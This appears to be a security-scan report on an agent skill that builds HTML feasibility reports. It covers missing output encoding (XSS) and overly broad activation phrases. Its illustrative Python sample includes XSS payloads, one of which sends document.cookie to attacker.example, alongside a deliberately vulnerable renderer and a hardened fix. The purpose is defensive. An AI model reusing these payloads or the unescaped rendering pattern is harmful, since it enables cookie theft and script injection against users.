Agent开发决策辅助系统 (Agent Development Decision Support System)

Security checks across malware telemetry and agentic risk

Overview

The skill matches its stated report-generation purpose, but its broad activation phrases and its generation of active HTML reports without output encoding warrant review before installation.

Review this before installing. Use it only when you intentionally want an Agent feasibility report, keep output paths inside a safe workspace, and be cautious opening generated HTML if any report content came from untrusted user input or web pages. The publisher should narrow activation phrases, add confirmation before web/file actions, constrain output paths, and HTML-escape report content.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
Findings (4)

Context-Inappropriate Capability

Medium severity
Confidence: 98%
Finding
The generator interpolates many user-controlled fields directly into HTML attributes, element bodies, and the page title without any output encoding. Because the produced report is an active HTML document that also contains inline JavaScript, an attacker can inject script or markup through inputs such as name, direction, or nested JSON fields, which becomes stored/local XSS when the report is opened in a browser.
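As an added example (not the skill's own code, which the page does not show), the block below reproduces the interpolation pattern this finding describes next to a hardened renderer that encodes every field, including nested JSON, and adds the workspace containment check for the output path that the Overview recommends. The sample report, the field names and the attacker host are constructed for illustration and assumed only for this example.

```python
import html
import json
from pathlib import Path

# Constructed sample report (not data from the skill): the string fields carry
# the kind of markup an attacker could plant in a prompt or in a fetched page.
SAMPLE_REPORT = {
    "name": 'Legal Agent" onmouseover="alert(document.cookie)',
    "direction": "<script>fetch('https://attacker.example/?c='+document.cookie)</script>",
    "feasibility": 0.72,
    "risks": ["Regulatory exposure", "<img src=x onerror=alert(1)>"],
    "meta": {"source": "web", "note": "</title><script>alert(2)</script>"},
}


def render_vulnerable(report: dict) -> str:
    """The pattern in the finding: fields dropped straight into the title,
    an attribute and element bodies with no output encoding."""
    risks = "".join(f"<li>{r}</li>" for r in report["risks"])
    return (
        f"<html><head><title>{report['name']}</title></head><body>"
        f"<h1 data-name=\"{report['name']}\">{report['name']}</h1>"
        f"<p>{report['direction']}</p><ul>{risks}</ul>"
        f"<pre>{json.dumps(report['meta'])}</pre>"
        "<script>document.title += ' (generated)';</script></body></html>"
    )


def esc(value) -> str:
    """Encode one scalar for HTML text or a quoted attribute. quote=True also
    turns ' and " into entities, which is what stops attribute breakout."""
    return html.escape(str(value), quote=True)


def escape_tree(value):
    """Escape nested JSON-like data recursively so a template that walks
    lists or dicts cannot reach an unencoded leaf. Keys are kept as-is
    because they are used for lookup, never rendered."""
    if isinstance(value, dict):
        return {k: escape_tree(v) for k, v in value.items()}
    if isinstance(value, list):
        return [escape_tree(v) for v in value]
    return esc(value)


def render_hardened(report: dict) -> str:
    """Same layout, every field encoded. Report data is never placed inside a
    <script> block: html.escape does not make a string safe in JS context, so
    the inline script is dropped rather than fed report content."""
    r = escape_tree(report)
    risks = "".join(f"<li>{x}</li>" for x in r["risks"])
    # Serialise the raw dict first and escape the JSON text once; escaping the
    # already-escaped tree would double-encode the quotes inside the JSON.
    meta = esc(json.dumps(report["meta"]))
    return (
        f"<html><head><title>{r['name']}</title></head><body>"
        f"<h1 data-name=\"{r['name']}\">{r['name']}</h1>"
        f"<p>{r['direction']}</p><ul>{risks}</ul>"
        f"<pre>{meta}</pre></body></html>"
    )


def is_contained(workspace: str, requested: str) -> bool:
    """True only if the requested path resolves to a file strictly inside the
    workspace. resolve() normalises absolute paths, ../ traversal and symlinks
    before the check, and the workspace directory itself is not a valid target."""
    root = Path(workspace).resolve()
    target = (root / requested).resolve()
    return root in target.parents


def safe_output_path(workspace: str, requested: str) -> Path:
    """Resolve the report path or refuse it when it escapes the workspace."""
    if not is_contained(workspace, requested):
        raise ValueError(f"output path {requested!r} escapes workspace {workspace!r}")
    return (Path(workspace).resolve() / requested).resolve()


def write_report(workspace: str, requested: str, report: dict) -> Path:
    """Hardened write: contained path plus encoded HTML."""
    target = safe_output_path(workspace, requested)
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text(render_hardened(report), encoding="utf-8")
    return target


if __name__ == "__main__":
    print(render_vulnerable(SAMPLE_REPORT))
    print(render_hardened(SAMPLE_REPORT))
```

Opening the vulnerable output in a browser runs the injected handlers and script; the hardened output shows the same strings as inert text. Encoding covers HTML text and quoted attribute contexts only, so any field that must reach JavaScript, a URL or CSS needs a context-specific encoder, and a report that is going to be rendered from untrusted input is safer without inline script at all.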

Vague Triggers

Medium severity
Confidence: 89%
Finding
The trigger phrases shown in the README are broad natural-language requests such as 'Agent开发' (Agent development), '做Agent应用' (build an Agent application), and similar generic wording. In a chat-based host, overly generic triggers can cause the skill to activate during ordinary discussion about agents rather than when the user explicitly intends to invoke this specific skill, leading to unintended execution, confusion, or disclosure of user inputs to the skill pipeline.

Vague Triggers

Medium severity
Confidence: 92%
Finding
The trigger phrases are broad and include common natural-language expressions such as 'Agent开发' (Agent development), '搭建Agent' (set up an Agent), and 'AI助手开发' (AI assistant development), which can cause the skill to activate in contexts where the user did not clearly intend it. In an agent with WebSearch, WebFetch, Bash, and file-writing/report-generation capabilities, accidental activation can lead to unintended external requests or file creation based on ordinary conversation.

Vague Triggers

Medium severity
Confidence: 94%
Finding
The usage examples accept free-form requests like '帮我评估做AI法律咨询Agent可行吗' (help me assess whether building an AI legal-consulting Agent is feasible), which trains the system to treat ordinary conversational prompts as activation signals without boundary markers. Because the workflow includes web access and HTML report generation via Python with file output, ambiguous invocation increases the risk of unintended tool use, unnecessary data collection, or overwriting files during routine discussion.

VirusTotal

65/65 vendors reported this skill as clean.